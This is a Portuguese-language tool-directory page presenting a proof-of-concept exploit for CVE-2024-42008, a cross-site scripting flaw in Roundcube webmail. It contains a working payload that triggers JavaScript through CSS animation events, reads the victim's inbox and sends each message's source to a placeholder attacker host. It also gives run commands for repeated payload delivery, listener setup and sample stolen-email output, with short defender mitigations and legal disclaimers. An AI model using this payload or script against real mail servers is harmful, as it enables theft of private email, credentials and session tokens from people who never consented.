Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Roundcube-CVE-2024-42008-POC — Exploit de prova de conceito para CVE-2024-42008, uma vulnerabilidade de Cross-Site Scripting no webmail RoundCube. Entrega payloads XSS por meio de formulários de contato para roubar e-mails, credenciais e tokens de sessão em ambientes autorizados de teste de penetração. | Kitploit
Ferramentas/GitHubGitHub/rpgsec/roundcube-cve-2024-42008-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebPhishingCTFAprendizado e Educação
GitHubrpgsec/roundcube-cve-2024-42008-poc

Roundcube-CVE-2024-42008-POC

Exploit de prova de conceito para CVE-2024-42008, uma vulnerabilidade de Cross-Site Scripting no webmail RoundCube. Entrega payloads XSS por meio de formulários de contato para roubar e-mails, credenciais e tokens de sessão em ambientes autorizados de teste de penetração.

Ver Repositório
19há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-42008 Exploração XSS no RoundCube

Visão Geral

Este repositório contém uma prova de conceito de exploração para CVE-2024-42008, uma vulnerabilidade de Cross-Site Scripting (XSS) na aplicação de webmail RoundCube. Esta exploração foi projetada para fins educacionais e ambientes controlados de teste de penetração como HackTheBox.

Detalhes da Vulnerabilidade

Resumo do CVE-2024-42008

  • CVE ID: CVE-2024-42008
  • Tipo: Cross-Site Scripting (XSS)
  • Pontuação CVSS: Alta
  • Versões Afetadas:
    • RoundCube ≤ 1.5.7
    • RoundCube 1.6.x ≤ 1.6.7
  • Versões Corrigidas: 1.5.8, 1.6.8+

Detalhes Técnicos

A vulnerabilidade existe em rcmail_action_mail_get->run() e permite que atacantes remotos executem JavaScript arbitrário nos navegadores das vítimas. A falha decorre da validação insuficiente de entrada ao processar conteúdo de e-mail, especialmente no tratamento de animações CSS e contextos de execução JavaScript.

Vetor de Ataque Chave:

  • Conteúdo HTML malicioso injetado através de formulários de contato ou mensagens de e-mail
  • Propriedades de animação CSS usadas para acionar a execução de JavaScript
  • Manipuladores de evento onanimationstart contornam filtros de conteúdo
  • O payload JavaScript executa no contexto da aplicação de webmail

Impacto

A exploração bem-sucedida permite que atacantes:

  • Roubar e-mails da vítima da CAIXA DE ENTRADA e outras pastas
  • Exfiltrar metadados de e-mail (UIDs, listas de mensagens)
  • Acessar código-fonte e anexos de e-mail
  • Enviar e-mails da conta da vítima
  • Coletar credenciais de login e tokens de sessão
  • Realizar ações em nome da vítima

Análise do Script de Exploração

Arquitetura do Script

A exploração consiste em três componentes principais:

  1. Entrega de Payload XSS: Envia HTML malicioso via formulário de contato
  2. Servidor HTTP: Escuta dados exfiltrados
  3. Processamento de Dados: Captura e registra e-mails roubados

Detalhamento do Payload

root@kitploit:~
// The core XSS payload uses CSS animations to trigger JavaScript
<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=
  // 1. Fetch email list from victim's INBOX
  fetch('/?_task=mail&_action=list&_mbox=INBOX&_page=&_remote=1')
  .then(r=>r.text())
  .then(t=>{
    // 2. Extract email UIDs using regex
    [...t.matchAll(/this\\.add_message_row\\((\\d+),/g)].forEach(m=>{
      // 3. For each email, fetch full source
      fetch(`/?_task=mail&_uid=${m[1]}&_mbox=INBOX&_action=viewsource`)
      .then(r=>r.text())
      .then(data=>{
        // 4. Exfiltrate email data to attacker server
        fetch(`http://ATTACKER_IP:PORT/?data=${encodeURIComponent(data)}`)
      })
    })
  })
; foo=bar">

Principais Características

  • Operação Contínua: Pode enviar payloads em intervalos regulares
  • Modo Furtivo: Pegada mínima e tratamento de erros
  • Registro de Dados: Captura e armazenamento automáticos de e-mails exfiltrados
  • Modo de Depuração: Suporte a proxy para análise de tráfego
  • Configurável: Múltiplas opções de linha de comando

Uso

Pré-requisitos

root@kitploit:~
pip install requests

Uso Básico

root@kitploit:~
# Single payload delivery
python cve-2024-42008-exploit.py

# Continuous mode (every 30 seconds)
python cve-2024-42008-exploit.py -c

# Custom interval (every 60 seconds)
python cve-2024-42008-exploit.py -c -i 60

# Debug mode with proxy
python cve-2024-42008-exploit.py -d

Configuração

Edite o script para configurar:

  • ATTACKER_IP: IP do seu servidor de escuta
  • ATTACKER_PORT: Porta para receber dados exfiltrados
  • RECIPIENT_EMAIL: Endereço de e-mail alvo
  • TARGET_URL: Instância vulnerável do RoundCube
  • PROXY: Servidor proxy para depuração (Burp Suite/Caido)

Opções de Linha de Comando

OpçãoDescrição
-d, --debugAtiva o modo de depuração com suporte a proxy
-c, --continuousEnvia payloads continuamente
-i, --intervalIntervalo entre payloads (padrão: 30s)

Fluxo de Ataque

  1. Injeção de Payload: O script envia HTML malicioso via formulário de contato
  2. Entrega de E-mail: O RoundCube vulnerável processa e entrega o e-mail
  3. Interação da Vítima: O usuário abre/visualiza o e-mail malicioso
  4. Execução XSS: A animação CSS aciona o payload JavaScript
  5. Exfiltração de Dados: O JavaScript rouba e-mails e os envia para o atacante
  6. Captura de Dados: O servidor de exploração recebe e registra os dados roubados

Detecção e Mitigação

Para Defensores

Indicadores de Detecção:

  • Propriedades de animação CSS incomuns no conteúdo do e-mail
  • Manipuladores de evento onanimationstart em HTML
  • JavaScript suspeito em mensagens de e-mail
  • Requisições de saída para domínios desconhecidos a partir do webmail
  • Envios repetidos de formulários de contato

Estratégias de Mitigação:

  • Atualizar o RoundCube para a versão 1.5.8 ou 1.6.8+
  • Implementar Política de Segurança de Conteúdo (CSP)
  • Ativar filtragem de conteúdo de e-mail
  • Monitorar tráfego suspeito de saída
  • Auditorias de segurança regulares das configurações de webmail

Para Testadores de Penetração

Considerações de Teste:

  • Garantir autorização adequada antes de testar
  • Documentar todas as atividades para relatórios
  • Testar apenas em ambientes isolados
  • Verificar se o alvo é intencionalmente vulnerável
  • Seguir práticas de divulgação responsável

Considerações Legais e Éticas

⚠️ AVISO: Esta exploração é fornecida apenas para fins educacionais e de teste autorizado.

  • Use apenas em sistemas que você possui ou para os quais tenha permissão explícita para testar
  • Projetado para HackTheBox e plataformas de aprendizado similares
  • O uso não autorizado pode violar leis locais e internacionais
  • Sempre siga práticas de divulgação responsável
  • Respeite as regulamentações de privacidade e proteção de dados

Referências Técnicas

  • Entrada Oficial do CVE-2024-42008
  • Aviso de Segurança do RoundCube
  • CWE-79: Cross-site Scripting

Exemplo de Saída

root@kitploit:~
[+] Listening on 10.10.14.209:8001 for exfiltrated data...
[2024-07-09 10:30:15] POST Request Sent! Status Code: 200

[+] 📩 Captured Email Data:
Return-Path: <[email protected]>
Received: from localhost (localhost [127.0.0.1])
...
[Email content]
--------------------------------------------------
[+] 🔥 Email data saved to emails.log

Aviso Legal

Este código é fornecido apenas para fins educacionais e teste de penetração autorizado. Os autores não são responsáveis por qualquer uso indevido ou dano causado por este software. Sempre certifique-se de ter autorização adequada antes de testar qualquer sistema.

Baixar ferramenta